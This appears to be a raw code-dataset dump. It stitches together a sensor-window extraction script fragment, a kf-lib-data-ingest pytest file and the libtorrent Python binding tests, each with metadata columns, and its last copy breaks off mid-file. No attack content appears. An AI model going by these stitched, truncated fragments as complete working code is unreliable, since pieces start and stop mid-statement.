listEnd = timecodes['end'][1:].tolist()
listHand = timecodes['hand'][1:].tolist()
listLabel = timecodes['label'][1:].tolist()
listStage = timecodes['stage'][1:].tolist()
for i in range(0,len(listStart)):
listStart[i] = int(startRecording + math.floor(listStart[i])*60*1000 + (listStart[i] - math.floor(listStart[i]))*100*1000)
listEnd[i] = int(startRecording + math.floor(listEnd[i])*60*1000 + (listEnd[i] - math.floor(listEnd[i]))*100*1000)
dfTimestamps = ps.DataFrame(list(zip(listStart,listEnd,listHand,listLabel,listStage)), columns=['start','end','hand','label','stage'])
dfTimestamps = dfTimestamps.replace(np.nan,'',regex=True)
dfTimestamps = dfTimestamps.loc[(dfTimestamps['label'] != '')]
def GenerateNegativeWindows():
    """Cut one negative (behaviour-free) window per labelled behaviour.

    For each labelled behaviour a random second of the recording is drawn
    whose span does not overlap any behaviour interval; the acc/gyr/hrm
    samples in [mark - xSize, mark + ySize] seconds are then written to
    per-sensor CSV files under `windows/`.
    """
    sensorDataAcc = ps.read_csv(directory + f'acc{norm}.csv')
    sensorDataGyr = ps.read_csv(directory + f'gyr{norm}.csv')
    sensorDataHrm = ps.read_csv(directory + f'hrm{norm}.csv')
    sensorDataPpg = ps.read_csv(directory + 'ppgLabeled.csv')  # ppg processed separately

    def _dump_window(sensor_frame, sensor_name, mark, window_index):
        # Slice [mark - xSize, mark + ySize] (milliseconds) and export it.
        window = sensor_frame.loc[(sensor_frame['timestamp'] >= mark - xSize * 1000)
                                  & (sensor_frame['timestamp'] <= mark + ySize * 1000)]
        window = window.drop('hand', axis=1)  # non-inplace: avoids chained-assignment warning
        window.to_csv(f'{directory}windows/{uID}_{sensor_name}_-_{window_index}.csv', index=False)

    for i in range(len(dfTimestamps)):
        wIndex = i + 1
        check = True
        while check:
            # BUGFIX: randrange() requires integer bounds in Python 3; the
            # original passed floats (startRecording / 1000) which raises.
            mark = random.randrange(startRecording // 1000, endRecording // 1000, 1) * 1000
            if mark < startRecording + xSize * 1000:
                continue
            for j in dfTimestamps.itertuples():
                if mark > j[1] and mark < j[2]:
                    break  # mark falls inside a behaviour period: resample
                elif mark + ySize * 1000 > j[1] and mark + ySize * 1000 < j[2]:
                    break  # labelled window would overlap a behaviour: resample
            else:
                # BUGFIX: only accept the mark when the loop finished without
                # a break; previously `check = False` ran unconditionally, so
                # overlapping marks were never resampled.
                check = False
        _dump_window(sensorDataAcc, 'acc', mark, wIndex)
        _dump_window(sensorDataGyr, 'gyr', mark, wIndex)
        _dump_window(sensorDataHrm, 'hrm', mark, wIndex)


GenerateNegativeWindows()
# # generate positive and negative windows of length
# def GeneratePositiveWindows(sensorType):
# sensorData = ps.read_csv(directory + sensorType + 'Labeled.csv')
# window = ps.DataFrame()
# wIndex = 1
# lastTuple = (listStart[0],listEnd[0])
# for i in dfTimestamps.itertuples():
# if i[1] - xSize * 1000 < startRecording or i[4] == -1:
# continue
# # If behaviour not as long as y window
# # if i[2]-i[1] < ySize * 1000:
# # continue
# window = sensorData.loc[(sensorData['timestamp'] >= i[1] - xSize * 1000) & (sensorData['timestamp'] <= i[2] + ySize * 1000)]
# print(i)
# if i[1] - lastTuple[1] > xSize * 1000:
# # window.to_csv(directory + sensorType + 'Window' + '_' + str(wIndex) + '_' + str(i[4]) + '_clean' + '.csv', index=False)
# window.to_csv(f'{directory}{sensorType}Window_{wIndex}_{i[4]}_clean.csv', index=False)
# else:
# # window.to_csv(directory + sensorType + 'Window' + '_' + str(wIndex) + '_' + str(i[4]) + '_dirty' + '.csv', index=False)
# window.to_csv(f'{directory}{sensorType}Window_{wIndex}_{i[4]}_dirty.csv', index=False)
# wIndex += 1
# # f'Window_{wIndex}_{i[4]}_clean.csv'
# GeneratePositiveWindows('acc')
|
en
| 0.370915
|
### Negative windows # prediction window and labeled window length in seconds # xwindow size # ywindow size # participant ID # normalisation type: zscore/minmax # ppg processed separately # print(mark) # print('during behaviour period ' + str(wIndex) + ' ') # print('behaviour overlap ' + str(wIndex) + ' ' + str(j[1])) # print('acc windows generated') # print('gyr windows generated') # print('hrm windows generated') # window = sensorDataPpg.loc[(sensorDataPpg['timestamp'] >= mark - xSize * 1000) & (sensorDataPpg['timestamp'] <= mark + ySize * 1000)] # window.drop('hand',axis=1,inplace=True) # window.to_csv(f'{directory}windows/P{uID}_ppg_{wIndex}_-_.csv', index=False) # # generate positive and negative windows of length # def GeneratePositiveWindows(sensorType): # sensorData = ps.read_csv(directory + sensorType + 'Labeled.csv') # window = ps.DataFrame() # wIndex = 1 # lastTuple = (listStart[0],listEnd[0]) # for i in dfTimestamps.itertuples(): # if i[1] - xSize * 1000 < startRecording or i[4] == -1: # continue # # If behaviour not as long as y window # # if i[2]-i[1] < ySize * 1000: # # continue # window = sensorData.loc[(sensorData['timestamp'] >= i[1] - xSize * 1000) & (sensorData['timestamp'] <= i[2] + ySize * 1000)] # print(i) # if i[1] - lastTuple[1] > xSize * 1000: # # window.to_csv(directory + sensorType + 'Window' + '_' + str(wIndex) + '_' + str(i[4]) + '_clean' + '.csv', index=False) # window.to_csv(f'{directory}{sensorType}Window_{wIndex}_{i[4]}_clean.csv', index=False) # else: # # window.to_csv(directory + sensorType + 'Window' + '_' + str(wIndex) + '_' + str(i[4]) + '_dirty' + '.csv', index=False) # window.to_csv(f'{directory}{sensorType}Window_{wIndex}_{i[4]}_dirty.csv', index=False) # wIndex += 1 # # f'Window_{wIndex}_{i[4]}_clean.csv' # GeneratePositiveWindows('acc')
| 2.314624
| 2
|
tests/test_load_stage.py
|
kids-first/kf-lib-data-ingest
| 3
|
6627619
|
<reponame>kids-first/kf-lib-data-ingest
import os
import pytest
from click.testing import CliRunner
from pandas import DataFrame
from conftest import KIDS_FIRST_CONFIG, TEST_INGEST_CONFIG
from kf_lib_data_ingest.app import cli
from kf_lib_data_ingest.common.errors import InvalidIngestStageParameters
from kf_lib_data_ingest.etl.configuration.base_config import (
ConfigValidationError,
)
from kf_lib_data_ingest.etl.load.load_shim import LoadStage
@pytest.fixture(scope="function")
def load_stage(tmpdir):
    """Fresh dry-run LoadStage backed by a per-test cache directory."""
    stage = LoadStage(
        KIDS_FIRST_CONFIG,
        "http://URL_A",
        [],
        "FAKE_STUDY_A",
        cache_dir=tmpdir,
        dry_run=True,
    )
    return stage
@pytest.mark.parametrize(
    "run_input",
    [
        "foo",
        {"foo": "bar"},
        {"participant": "foo"},
        {"participant": ["foo"]},
    ],
)
def test_invalid_run_parameters(load_stage, caplog, run_input):
    """Running the load stage with malformed input must raise."""
    with pytest.raises(InvalidIngestStageParameters):
        load_stage.run(run_input)
def test_uid_cache(tmpdir):
    """UID caches are shared per (target URL, study) and isolated otherwise."""

    def make_stage(url, study):
        # All stages share the same cache_dir so file-path comparisons are
        # meaningful.
        return LoadStage(
            KIDS_FIRST_CONFIG,
            url,
            [],
            study,
            cache_dir=tmpdir,
            dry_run=True,
        )

    # Same URL + study -> both stages read and write one cache file.
    a1 = make_stage("http://URL_A", "FAKE_STUDY_A")
    a2 = make_stage("http://URL_A", "FAKE_STUDY_A")

    assert os.path.exists(a1.uid_cache_filepath)
    a1._store_target_id_for_key(
        "entity_type", "entity_unique_key", "target_id", True
    )
    assert (
        a1._get_target_id_from_key("entity_type", "entity_unique_key")
        == "target_id"
    )
    assert os.path.exists(a2.uid_cache_filepath)
    a2._store_target_id_for_key(
        "entity_type", "entity_unique_key", "target_id", True
    )
    assert (
        a2._get_target_id_from_key("entity_type", "entity_unique_key")
        == "target_id"
    )
    assert a1.uid_cache_filepath == a2.uid_cache_filepath

    # Different URLs -> distinct cache files, even within one study.
    b1 = make_stage("http://URL_B1", "FAKE_STUDY_B")
    b2 = make_stage("URL_B2", "FAKE_STUDY_B")
    assert "URL_B2" in b2.uid_cache_filepath
    assert "URL_B1" in b1.uid_cache_filepath
    assert os.path.exists(b1.uid_cache_filepath)
    assert os.path.exists(b2.uid_cache_filepath)
    b1._store_target_id_for_key(
        "entity type", "entity unique key", "target_id", True
    )
    assert (
        b1._get_target_id_from_key("entity type", "entity unique key")
        == "target_id"
    )
    b2._store_target_id_for_key(
        "entity type", "entity_unique_key", "target id", True
    )
    assert (
        b2._get_target_id_from_key("entity type", "entity_unique_key")
        == "target id"
    )
    assert b1.uid_cache_filepath != a1.uid_cache_filepath
    assert b1.uid_cache_filepath != b2.uid_cache_filepath
def test_ingest_load_async_error():
    """
    Test that async loading exits when threads raise exceptions.
    """
    prev_environ = os.environ.get("MAX_RETRIES_ON_CONN_ERROR")
    os.environ["MAX_RETRIES_ON_CONN_ERROR"] = "0"
    try:
        runner = CliRunner()
        result = runner.invoke(
            cli.ingest,
            [TEST_INGEST_CONFIG, "--use_async", "--target_url", "http://potato"],
        )
        assert result.exit_code == 1
    finally:
        # BUGFIX: restore the environment in a finally block so an assertion
        # failure cannot leak MAX_RETRIES_ON_CONN_ERROR into other tests;
        # `is not None` (not truthiness) also preserves a prior empty string.
        if prev_environ is not None:
            os.environ["MAX_RETRIES_ON_CONN_ERROR"] = prev_environ
        else:
            del os.environ["MAX_RETRIES_ON_CONN_ERROR"]
@pytest.mark.parametrize(
    "ret_val, error",
    [
        (None, InvalidIngestStageParameters),
        ("foo", InvalidIngestStageParameters),
        ({"foo": DataFrame()}, ConfigValidationError),
        (
            {
                "foo": DataFrame(),
                "participant": DataFrame(),
                "default": DataFrame(),
            },
            ConfigValidationError,
        ),
        ({"default": DataFrame()}, None),
        ({"participant": DataFrame()}, None),
    ],
)
def test_bad_ret_vals_transform_funct(ret_val, error, load_stage):
    """Transform-function return values are validated before loading."""
    if error is None:
        # Valid shapes must pass validation without raising.
        load_stage._validate_run_parameters(ret_val)
    else:
        with pytest.raises(error):
            load_stage._validate_run_parameters(ret_val)
|
import os
import pytest
from click.testing import CliRunner
from pandas import DataFrame
from conftest import KIDS_FIRST_CONFIG, TEST_INGEST_CONFIG
from kf_lib_data_ingest.app import cli
from kf_lib_data_ingest.common.errors import InvalidIngestStageParameters
from kf_lib_data_ingest.etl.configuration.base_config import (
ConfigValidationError,
)
from kf_lib_data_ingest.etl.load.load_shim import LoadStage
@pytest.fixture(scope="function")
def load_stage(tmpdir):
return LoadStage(
KIDS_FIRST_CONFIG,
"http://URL_A",
[],
"FAKE_STUDY_A",
cache_dir=tmpdir,
dry_run=True,
)
@pytest.mark.parametrize(
"run_input",
[
("foo"),
({"foo": "bar"}),
({"participant": "foo"}),
({"participant": ["foo"]}),
],
)
def test_invalid_run_parameters(load_stage, caplog, run_input):
"""
Test running transform with invalid run params
"""
with pytest.raises(InvalidIngestStageParameters):
load_stage.run(run_input)
def test_uid_cache(tmpdir):
    """
    Stages pointing at the same (target URL, study) pair must share one UID
    cache file; a differing URL or study must yield a distinct file.
    """
    a1 = LoadStage(
        KIDS_FIRST_CONFIG,
        "http://URL_A",
        [],
        "FAKE_STUDY_A",
        cache_dir=tmpdir,
        dry_run=True,
    )
    a2 = LoadStage(
        KIDS_FIRST_CONFIG,
        "http://URL_A",
        [],
        "FAKE_STUDY_A",
        cache_dir=tmpdir,
        dry_run=True,
    )
    # cache file is created eagerly on construction
    assert os.path.exists(a1.uid_cache_filepath)
    a1._store_target_id_for_key(
        "entity_type", "entity_unique_key", "target_id", True
    )
    assert (
        a1._get_target_id_from_key("entity_type", "entity_unique_key")
        == "target_id"
    )
    assert os.path.exists(a2.uid_cache_filepath)
    a2._store_target_id_for_key(
        "entity_type", "entity_unique_key", "target_id", True
    )
    assert (
        a2._get_target_id_from_key("entity_type", "entity_unique_key")
        == "target_id"
    )
    # same URL + same study -> same cache file
    assert a1.uid_cache_filepath == a2.uid_cache_filepath
    b1 = LoadStage(
        KIDS_FIRST_CONFIG,
        "http://URL_B1",
        [],
        "FAKE_STUDY_B",
        cache_dir=tmpdir,
        dry_run=True,
    )
    b2 = LoadStage(
        KIDS_FIRST_CONFIG,
        "URL_B2",
        [],
        "FAKE_STUDY_B",
        cache_dir=tmpdir,
        dry_run=True,
    )
    # the target URL is encoded into the cache file name
    assert "URL_B2" in b2.uid_cache_filepath
    assert "URL_B1" in b1.uid_cache_filepath
    assert os.path.exists(b1.uid_cache_filepath)
    assert os.path.exists(b2.uid_cache_filepath)
    b1._store_target_id_for_key(
        "entity type", "entity unique key", "target_id", True
    )
    assert (
        b1._get_target_id_from_key("entity type", "entity unique key")
        == "target_id"
    )
    b2._store_target_id_for_key(
        "entity type", "entity_unique_key", "target id", True
    )
    assert (
        b2._get_target_id_from_key("entity type", "entity_unique_key")
        == "target id"
    )
    # different study/URL -> distinct cache files
    assert b1.uid_cache_filepath != a1.uid_cache_filepath
    assert b1.uid_cache_filepath != b2.uid_cache_filepath
def test_ingest_load_async_error():
    """
    Test that async loading exits when threads raise exceptions.

    Sets MAX_RETRIES_ON_CONN_ERROR=0 so the connection failure against the
    unreachable target URL is not retried, then asserts the ingest CLI
    exits non-zero.
    """
    prev_environ = os.environ.get("MAX_RETRIES_ON_CONN_ERROR")
    os.environ["MAX_RETRIES_ON_CONN_ERROR"] = "0"
    try:
        runner = CliRunner()
        result = runner.invoke(
            cli.ingest,
            [TEST_INGEST_CONFIG, "--use_async", "--target_url", "http://potato"],
        )
        assert result.exit_code == 1
    finally:
        # Restore the caller's environment even when the invoke or the
        # assertion above fails, so other tests are not polluted.
        if prev_environ:
            os.environ["MAX_RETRIES_ON_CONN_ERROR"] = prev_environ
        else:
            del os.environ["MAX_RETRIES_ON_CONN_ERROR"]
@pytest.mark.parametrize(
    "ret_val, error",
    [
        (None, InvalidIngestStageParameters),
        ("foo", InvalidIngestStageParameters),
        ({"foo": DataFrame()}, ConfigValidationError),
        (
            {
                "foo": DataFrame(),
                "participant": DataFrame(),
                "default": DataFrame(),
            },
            ConfigValidationError,
        ),
        ({"default": DataFrame()}, None),
        ({"participant": DataFrame()}, None),
    ],
)
def test_bad_ret_vals_transform_funct(ret_val, error, load_stage):
    """
    Validate run-parameter checking: malformed return values raise the
    expected error type, valid ones pass through without raising.
    """
    if error is None:
        load_stage._validate_run_parameters(ret_val)
    else:
        with pytest.raises(error):
            load_stage._validate_run_parameters(ret_val)
|
en
| 0.65664
|
Test running transform with invalid run params Test that async loading exits when threads raise exceptions Test input validation
| 1.986447
| 2
|
src/3rdparty/torrent-rasterbar/bindings/python/test.py
|
adem4ik/LIII
| 664
|
6627620
|
#!/usr/bin/env python
import libtorrent as lt
import unittest
import time
import os
import shutil
import binascii
import inspect
import pickle
class test_create_torrent(unittest.TestCase):
    def test_from_torrent_info(self):
        """Round-trip: regenerating a torrent from its parsed info must
        reproduce the original .torrent file byte-for-byte."""
        ti = lt.torrent_info('unordered.torrent')
        ct = lt.create_torrent(ti, True)
        entry = ct.generate()
        content = lt.bencode(entry).strip()
        with open('unordered.torrent', 'rb') as f:
            file_content = bytearray(f.read().strip())
        print(content)
        print(file_content)
        print(entry)
        self.assertEqual(content, file_content)
class test_session_stats(unittest.TestCase):
    def test_unique(self):
        """Every stats metric must carry a distinct value_index."""
        metrics = lt.session_stats_metrics()
        self.assertTrue(len(metrics) > 40)
        seen = set()
        for metric in metrics:
            self.assertTrue(metric.value_index not in seen)
            seen.add(metric.value_index)

    def test_find_idx(self):
        """Looking up a known metric name yields its fixed index."""
        self.assertEqual(lt.find_metric_idx("peer.error_peers"), 0)
class test_torrent_handle(unittest.TestCase):
    """Exercise torrent_handle operations on a torrent added to a local session."""

    def setup(self):
        # Deliberately not unittest's setUp(): each test calls this explicitly
        # so the session/handle are only created when needed.
        self.ses = lt.session({'alert_mask': lt.alert.category_t.all_categories, 'enable_dht': False})
        self.ti = lt.torrent_info('url_seed_multi.torrent')
        self.h = self.ses.add_torrent({'ti': self.ti, 'save_path': os.getcwd()})

    def test_torrent_handle(self):
        self.setup()
        self.assertEqual(self.h.file_priorities(), [4, 4])
        self.assertEqual(self.h.piece_priorities(), [4])

        self.h.prioritize_files([0, 1])
        self.assertEqual(self.h.file_priorities(), [0, 1])

        self.h.prioritize_pieces([0])
        self.assertEqual(self.h.piece_priorities(), [0])

        # also test the overload that takes a list of piece->priority mappings
        self.h.prioritize_pieces([(0, 1)])
        self.assertEqual(self.h.piece_priorities(), [1])

    def test_torrent_handle_in_set(self):
        self.setup()
        torrents = set()
        torrents.add(self.h)

        # get another instance of a torrent_handle that represents the same
        # torrent. Make sure that when we add it to a set, it just replaces the
        # existing object
        t = self.ses.get_torrents()
        self.assertEqual(len(t), 1)
        for h in t:
            torrents.add(h)
        self.assertEqual(len(torrents), 1)

    def test_torrent_handle_in_dict(self):
        self.setup()
        torrents = {}
        torrents[self.h] = 'foo'

        # get another instance of a torrent_handle that represents the same
        # torrent. Make sure that when we add it to a dict, it just replaces the
        # existing object
        t = self.ses.get_torrents()
        self.assertEqual(len(t), 1)
        for h in t:
            torrents[h] = 'bar'
        self.assertEqual(len(torrents), 1)
        self.assertEqual(torrents[self.h], 'bar')

    def test_replace_trackers(self):
        self.setup()
        trackers = []
        for idx, tracker_url in enumerate(('udp://tracker1.com', 'udp://tracker2.com')):
            tracker = lt.announce_entry(tracker_url)
            tracker.tier = idx
            tracker.fail_limit = 2
            trackers.append(tracker)
        self.h.replace_trackers(trackers)
        new_trackers = self.h.trackers()
        self.assertEqual(new_trackers[0]['url'], 'udp://tracker1.com')
        self.assertEqual(new_trackers[1]['tier'], 1)
        self.assertEqual(new_trackers[1]['fail_limit'], 2)

    def test_pickle_trackers(self):
        """Test lt objects convertors are working and trackers can be pickled"""
        self.setup()
        tracker = lt.announce_entry('udp://tracker1.com')
        tracker.tier = 0
        tracker.fail_limit = 1
        trackers = [tracker]
        self.h.replace_trackers(trackers)
        tracker_list = [tracker for tracker in self.h.trackers()]
        pickled_trackers = pickle.dumps(tracker_list)
        unpickled_trackers = pickle.loads(pickled_trackers)
        self.assertEqual(unpickled_trackers[0]['url'], 'udp://tracker1.com')
        self.assertEqual(unpickled_trackers[0]['last_error']['value'], 0)

    def test_file_status(self):
        self.setup()
        status_list = self.h.file_status()
        print(status_list)

    def test_piece_deadlines(self):
        self.setup()
        self.h.clear_piece_deadlines()

    def test_torrent_status(self):
        self.setup()
        st = self.h.status()
        ti = st.handle
        self.assertEqual(ti.info_hash(), self.ti.info_hash())
        # make sure we can compare torrent_status objects
        st2 = self.h.status()
        self.assertEqual(st2, st)

    def test_serialize_trackers(self):
        """Test to ensure the dict contains only python built-in types"""
        self.setup()
        self.h.add_tracker({'url': 'udp://tracker1.com'})
        tr = self.h.trackers()[0]
        # wait a bit until a valid timestamp appears
        # (fixed: compare against None with `is`, not `==` — PEP 8)
        while tr['next_announce'] is None:
            time.sleep(0.1)
            tr = self.h.trackers()[0]
        import json
        print(json.dumps(self.h.trackers()[0]))

    def test_scrape(self):
        self.setup()
        # this is just to make sure this function can be called like this
        # from python
        self.h.scrape_tracker()

    def test_cache_info(self):
        self.setup()
        cs = self.ses.get_cache_info(self.h)
        self.assertEqual(cs.pieces, [])
class test_torrent_info(unittest.TestCase):
    """Construction and inspection of torrent_info objects."""

    def test_bencoded_constructor(self):
        info = lt.torrent_info({'info': {'name': 'test_torrent', 'length': 1234,
                                         'piece length': 16 * 1024,
                                         'pieces': 'aaaaaaaaaaaaaaaaaaaa'}})
        self.assertEqual(info.num_files(), 1)

        f = info.files()
        self.assertEqual(f.file_path(0), 'test_torrent')
        self.assertEqual(f.file_size(0), 1234)
        self.assertEqual(info.total_size(), 1234)

    def test_metadata(self):
        ti = lt.torrent_info('base.torrent')
        self.assertTrue(len(ti.metadata()) != 0)
        self.assertTrue(len(ti.hash_for_piece(0)) != 0)

    def test_web_seeds(self):
        ti = lt.torrent_info('base.torrent')
        ws = [{'url': 'http://foo/test', 'auth': '', 'type': 0},
              {'url': 'http://bar/test', 'auth': '', 'type': 1}]
        ti.set_web_seeds(ws)
        web_seeds = ti.web_seeds()
        self.assertEqual(len(ws), len(web_seeds))
        for i in range(len(web_seeds)):
            self.assertEqual(web_seeds[i]["url"], ws[i]["url"])
            self.assertEqual(web_seeds[i]["auth"], ws[i]["auth"])
            self.assertEqual(web_seeds[i]["type"], ws[i]["type"])

    def test_iterable_files(self):
        # this detects whether libtorrent was built with deprecated APIs
        # the file_storage object is only iterable for backwards compatibility
        if not hasattr(lt, 'version'):
            return
        ses = lt.session({'alert_mask': lt.alert.category_t.all_categories, 'enable_dht': False})
        ti = lt.torrent_info('url_seed_multi.torrent')
        files = ti.files()

        idx = 0
        expected = ['bar.txt', 'var.txt']
        for f in files:
            print(f.path)
            self.assertEqual(os.path.split(f.path)[1], expected[idx])
            self.assertEqual(os.path.split(os.path.split(f.path)[0]), ('temp', 'foo'))
            idx += 1

    def test_announce_entry(self):
        ae = lt.announce_entry('test')
        # assertEqual: assertEquals is a deprecated alias, removed in Python 3.12
        self.assertEqual(ae.can_announce(False), True)
        self.assertEqual(ae.scrape_incomplete, -1)
        self.assertEqual(ae.next_announce, None)
        self.assertEqual(ae.last_error.value(), 0)
class test_alerts(unittest.TestCase):
    """Alert delivery and torrent_status field access."""

    def test_alert(self):
        ses = lt.session({'alert_mask': lt.alert.category_t.all_categories, 'enable_dht': False})
        ti = lt.torrent_info('base.torrent')
        h = ses.add_torrent({'ti': ti, 'save_path': os.getcwd()})
        st = h.status()
        time.sleep(1)
        ses.remove_torrent(h)
        ses.wait_for_alert(1000)  # milliseconds
        alerts = ses.pop_alerts()
        for a in alerts:
            if a.what() == 'add_torrent_alert':
                # assertEqual: assertEquals is deprecated (removed in 3.12)
                self.assertEqual(a.torrent_name, 'temp')
            print(a.message())
            for field_name in dir(a):
                if field_name.startswith('__'):
                    continue
                field = getattr(a, field_name)
                if callable(field):
                    print('   ', field_name, ' = ', field())
                else:
                    print('   ', field_name, ' = ', field)
        print(st.next_announce)
        self.assertEqual(st.name, 'temp')
        print(st.errc.message())
        print(st.pieces)
        print(st.last_seen_complete)
        print(st.completed_time)
        print(st.progress)
        print(st.num_pieces)
        print(st.distributed_copies)
        print(st.paused)
        print(st.info_hash)
        self.assertEqual(st.save_path, os.getcwd())

    def test_pop_alerts(self):
        ses = lt.session({'alert_mask': lt.alert.category_t.all_categories, 'enable_dht': False})
        ses.async_add_torrent({"ti": lt.torrent_info("base.torrent"), "save_path": "."})
        # this will cause an error (because of duplicate torrents) and the
        # torrent_info object created here will be deleted once the alert goes out
        # of scope. When that happens, it will decrement the python object, to allow
        # it to release the object.
        # we're trying to catch the error described in this post, with regards to
        # torrent_info.
        # https://mail.python.org/pipermail/cplusplus-sig/2007-June/012130.html
        ses.async_add_torrent({"ti": lt.torrent_info("base.torrent"), "save_path": "."})
        time.sleep(1)

        for i in range(0, 10):
            alerts = ses.pop_alerts()
            for a in alerts:
                print(a.message())
            time.sleep(0.1)
class test_bencoder(unittest.TestCase):
    def test_bencode(self):
        """Encoding a plain dict yields canonical bencoded bytes."""
        payload = {'a': 1, 'b': [1, 2, 3], 'c': 'foo'}
        self.assertEqual(lt.bencode(payload), b'd1:ai1e1:bli1ei2ei3ee1:c3:fooe')

    def test_bdecode(self):
        """Decoding returns byte-keyed/byte-valued primitives."""
        raw = b'd1:ai1e1:bli1ei2ei3ee1:c3:fooe'
        self.assertEqual(lt.bdecode(raw), {b'a': 1, b'b': [1, 2, 3], b'c': b'foo'})
class test_sha1hash(unittest.TestCase):
    def test_sha1hash(self):
        """A sha1_hash built from raw digest bytes stringifies back to hex."""
        hex_digest = 'a0' * 20
        digest = lt.sha1_hash(binascii.unhexlify(hex_digest))
        self.assertEqual(hex_digest, str(digest))
class test_magnet_link(unittest.TestCase):
    def test_parse_magnet_uri(self):
        """Adding a parsed magnet URI yields the expected info-hash."""
        session = lt.session({})
        params = lt.parse_magnet_uri('magnet:?xt=urn:btih:C6EIF4CCYDBTIJVG3APAGM7M4NDONCTI')
        params['save_path'] = '.'
        handle = session.add_torrent(params)
        self.assertEqual(str(handle.info_hash()), '178882f042c0c33426a6d81e0333ece346e68a68')
class test_peer_class(unittest.TestCase):
    """Peer-class creation, configuration and filtering."""

    def test_peer_class_ids(self):
        s = lt.session({'enable_dht': False})

        print('global_peer_class_id:', lt.session.global_peer_class_id)
        print('tcp_peer_class_id:', lt.session.tcp_peer_class_id)
        print('local_peer_class_id:', lt.session.local_peer_class_id)

        print('global: ', s.get_peer_class(s.global_peer_class_id))
        # fixed copy-paste bug: the 'tcp' line previously queried
        # local_peer_class_id, so the tcp class was never exercised
        print('tcp: ', s.get_peer_class(s.tcp_peer_class_id))
        print('local: ', s.get_peer_class(s.local_peer_class_id))

    def test_peer_class(self):
        s = lt.session({'enable_dht': False})
        c = s.create_peer_class('test class')
        print('new class: ', s.get_peer_class(c))
        nfo = s.get_peer_class(c)
        self.assertEqual(nfo['download_limit'], 0)
        self.assertEqual(nfo['upload_limit'], 0)
        self.assertEqual(nfo['ignore_unchoke_slots'], False)
        self.assertEqual(nfo['connection_limit_factor'], 100)
        self.assertEqual(nfo['download_priority'], 1)
        self.assertEqual(nfo['upload_priority'], 1)
        self.assertEqual(nfo['label'], 'test class')

        nfo['download_limit'] = 1337
        nfo['upload_limit'] = 1338
        nfo['ignore_unchoke_slots'] = True
        nfo['connection_limit_factor'] = 42
        nfo['download_priority'] = 2
        nfo['upload_priority'] = 3

        s.set_peer_class(c, nfo)

        nfo2 = s.get_peer_class(c)
        self.assertEqual(nfo, nfo2)

    def test_peer_class_filter(self):
        filt = lt.peer_class_type_filter()
        filt.add(lt.socket_type_t.tcp_socket, lt.session.global_peer_class_id)
        filt.remove(lt.socket_type_t.utp_socket, lt.session.local_peer_class_id)
        filt.disallow(lt.socket_type_t.tcp_socket, lt.session.global_peer_class_id)
        filt.allow(lt.socket_type_t.utp_socket, lt.session.local_peer_class_id)

    def test_peer_class_ip_filter(self):
        s = lt.session({'enable_dht': False})
        s.set_peer_class_type_filter(lt.peer_class_type_filter())
        s.set_peer_class_filter(lt.ip_filter())
class test_session(unittest.TestCase):
    """Session construction, settings application and settings presets."""

    def test_post_session_stats(self):
        s = lt.session({'alert_mask': lt.alert.category_t.stats_notification, 'enable_dht': False})
        s.post_session_stats()
        alerts = []
        # first the stats headers log line. but not if logging is disabled
        if 'log_alert' in [i[0] for i in inspect.getmembers(lt)]:
            s.wait_for_alert(1000)
            alerts = s.pop_alerts()
            a = alerts.pop(0)
            self.assertTrue(isinstance(a, lt.log_alert))
        # then the actual stats values
        if len(alerts) == 0:
            s.wait_for_alert(1000)
            alerts = s.pop_alerts()
        a = alerts.pop(0)
        self.assertTrue(isinstance(a, lt.session_stats_alert))
        self.assertTrue(isinstance(a.values, dict))
        self.assertTrue(len(a.values) > 0)

    def test_unknown_settings(self):
        try:
            s = lt.session({'unexpected-key-name': 42})
            # self.fail() is the idiomatic "no exception was raised" marker
            # (replaces assertFalse on a truthy string, same AssertionError)
            self.fail('should have thrown an exception')
        except KeyError as e:
            print(e)

    def test_fingerprint(self):
        self.assertEqual(lt.generate_fingerprint('LT', 0, 1, 2, 3), '-LT0123-')
        self.assertEqual(lt.generate_fingerprint('..', 10, 1, 2, 3), '-..A123-')

    def test_deprecated_settings(self):
        # this detects whether libtorrent was built with deprecated APIs
        if hasattr(lt, 'version'):
            s = lt.session({'enable_dht': False})
            sett = lt.session_settings()
            sett.num_want = 10
            s.set_settings(sett)
            s.set_settings({'num_want': 33})
            self.assertEqual(s.get_settings()['num_want'], 33)

    def test_apply_settings(self):
        s = lt.session({'enable_dht': False})
        s.apply_settings({'num_want': 66, 'user_agent': '<PASSWORD>'})
        self.assertEqual(s.get_settings()['num_want'], 66)
        self.assertEqual(s.get_settings()['user_agent'], '<PASSWORD>')

    def test_min_memory_preset(self):
        min_mem = lt.min_memory_usage()
        print(min_mem)
        self.assertTrue('connection_speed' in min_mem)
        self.assertTrue('file_pool_size' in min_mem)

    def test_seed_mode_preset(self):
        seed_mode = lt.high_performance_seed()
        print(seed_mode)
        self.assertTrue('alert_queue_size' in seed_mode)
        self.assertTrue('connection_speed' in seed_mode)
        self.assertTrue('file_pool_size' in seed_mode)

    def test_default_settings(self):
        default = lt.default_settings()
        print(default)
if __name__ == '__main__':
    # Print the bindings version, stage the fixture .torrent files next to
    # this script (the tests open them by bare filename), then run the suite.
    print(lt.__version__)
    shutil.copy(os.path.join('..', '..', 'test', 'test_torrents', 'url_seed_multi.torrent'), '.')
    shutil.copy(os.path.join('..', '..', 'test', 'test_torrents', 'base.torrent'), '.')
    shutil.copy(os.path.join('..', '..', 'test', 'test_torrents', 'unordered.torrent'), '.')
    unittest.main()
|
#!/usr/bin/env python
import libtorrent as lt
import unittest
import time
import os
import shutil
import binascii
import inspect
import pickle
class test_create_torrent(unittest.TestCase):
    def test_from_torrent_info(self):
        """Round-trip: regenerating a torrent from its parsed info must
        reproduce the original .torrent file byte-for-byte."""
        ti = lt.torrent_info('unordered.torrent')
        ct = lt.create_torrent(ti, True)
        entry = ct.generate()
        content = lt.bencode(entry).strip()
        with open('unordered.torrent', 'rb') as f:
            file_content = bytearray(f.read().strip())
        print(content)
        print(file_content)
        print(entry)
        self.assertEqual(content, file_content)
class test_session_stats(unittest.TestCase):
    def test_unique(self):
        """Every stats metric must carry a distinct value_index."""
        metrics = lt.session_stats_metrics()
        self.assertTrue(len(metrics) > 40)
        seen = set()
        for metric in metrics:
            self.assertTrue(metric.value_index not in seen)
            seen.add(metric.value_index)

    def test_find_idx(self):
        """Looking up a known metric name yields its fixed index."""
        self.assertEqual(lt.find_metric_idx("peer.error_peers"), 0)
class test_torrent_handle(unittest.TestCase):
    """Exercise torrent_handle operations on a torrent added to a local session."""

    def setup(self):
        # Deliberately not unittest's setUp(): each test calls this explicitly
        # so the session/handle are only created when needed.
        self.ses = lt.session({'alert_mask': lt.alert.category_t.all_categories, 'enable_dht': False})
        self.ti = lt.torrent_info('url_seed_multi.torrent')
